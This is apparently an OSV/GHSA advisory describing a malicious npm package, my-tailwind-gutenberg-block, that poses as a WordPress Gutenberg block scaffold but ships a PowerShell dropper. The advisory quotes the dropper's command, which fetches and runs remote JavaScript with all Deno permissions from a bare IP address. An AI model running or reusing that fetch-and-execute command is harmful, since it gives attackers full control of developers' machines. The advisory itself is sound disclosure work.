MAL-2026-10761

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/my-tailwind-gutenberg-block/MAL-2026-10761.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-10761
Aliases
  • GHSA-mhvw-mw3c-6mc5
Published
2026-07-16T22:28:42Z
Modified
2026-08-04T23:05:20Z
Summary
Malicious code in my-tailwind-gutenberg-block (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (8ba41c0d8f447e47febb6ceed2c87681bb0f518b74d42d898e024a7ab4418f61)

The package advertises itself as a WordPress Gutenberg + Tailwind block scaffold (src/edit.js, src/save.js, block.json), but the tarball also contains setup.ps1, an undocumented PowerShell script unrelated to the stated purpose. When run, setup.ps1 installs Scoop, winget, and the Deno runtime on the user's Windows host, then invokes deno run -A http://172.94.9.157/v028f8cde892b0b74c8.js — executing unpinned, unverified JavaScript fetched over plain HTTP from a bare IP with all Deno permissions granted (filesystem, network, environment, subprocess). Comments in the script self-describe the fetched code as a launcher-1 eval-loop that pulls launcher-2, which then sets up autorun and runs a main payload, indicating persistence. The mismatch between the advertised WordPress-block purpose and a Windows runtime dropper is a cover-story pattern; the bare-IP plain-HTTP delivery of a mutable script under a fully-permissioned alternate runtime is an install-time remote-code-execution vector against any developer who runs setup.ps1.

Source: ghsa-malware (964a3f6c00b9b203b2ce5d2bf2a913e877d136325b805010ef3615c2dcc6a52a)

Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "GHSA-mhvw-mw3c-6mc5",
            "import_time": "2026-07-16T22:34:22.04806361Z",
            "modified_time": "2026-07-16T22:28:43Z",
            "ranges": [
                {
                    "events": [
                        {
                            "introduced": "0"
                        }
                    ],
                    "type": "SEMVER"
                }
            ],
            "sha256": "964a3f6c00b9b203b2ce5d2bf2a913e877d136325b805010ef3615c2dcc6a52a",
            "source": "ghsa-malware"
        },
        {
            "id": "IN-MAL-2026-011014",
            "import_time": "2026-08-04T21:33:13.704156405Z",
            "modified_time": "2026-08-04T21:19:56Z",
            "sha256": "f6b6c4fcc3ee772047b4024426157af02c50e66c30ef5eab3b8f81463e03f2ae",
            "source": "amazon-inspector",
            "versions": [
                "0.1.2"
            ]
        },
        {
            "id": "IN-MAL-2026-011016",
            "import_time": "2026-08-04T21:33:13.781397849Z",
            "modified_time": "2026-08-04T21:20:10Z",
            "sha256": "5ee474f6ef92a64efe35f2dbe7f0decb6a240ea439f6af20e5f368947889903a",
            "source": "amazon-inspector",
            "versions": [
                "0.1.4"
            ]
        },
        {
            "id": "IN-MAL-2026-011015",
            "import_time": "2026-08-04T21:33:13.757417928Z",
            "modified_time": "2026-08-04T21:20:03Z",
            "sha256": "5f4d28b61b3e2445e3719611a0699a16393493adb306840de48dc30123c7e09c",
            "source": "amazon-inspector",
            "versions": [
                "0.1.3"
            ]
        },
        {
            "id": "IN-MAL-2026-011017",
            "import_time": "2026-08-04T21:33:13.826033846Z",
            "modified_time": "2026-08-04T21:20:21Z",
            "sha256": "905d98c3e2e38f63f16f9f0170a95c8208a3d351e89ffe22f47fb4cc95fa001c",
            "source": "amazon-inspector",
            "versions": [
                "0.1.5"
            ]
        },
        {
            "id": "IN-MAL-2026-011161",
            "import_time": "2026-08-04T22:30:02.504065301Z",
            "modified_time": "2026-08-04T21:41:21Z",
            "sha256": "8ba41c0d8f447e47febb6ceed2c87681bb0f518b74d42d898e024a7ab4418f61",
            "source": "amazon-inspector",
            "versions": [
                "0.1.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / my-tailwind-gutenberg-block

Package

Name
my-tailwind-gutenberg-block
View open source insights on deps.dev
Purl
pkg:npm/my-tailwind-gutenberg-block

Affected ranges

Type
SEMVER
Events
Introduced
0 Unknown introduced version / All previous versions are affected

Affected versions

0.*
0.1.0
0.1.2
0.1.3
0.1.4
0.1.5

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    },
    {
        "cweId": "CWE-506",
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "setup.js",
            "sha256": "d4302967bf6eb10eeaf6e345c6b85774b83c9bdbb9afe0196110b1ec132345b7",
            "tlsh": "0631369a23f840ea41335f76f9c2521ef31c117e92631311b47d4681bbb555acbe0d8b"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/my-tailwind-gutenberg-block/MAL-2026-10761.json"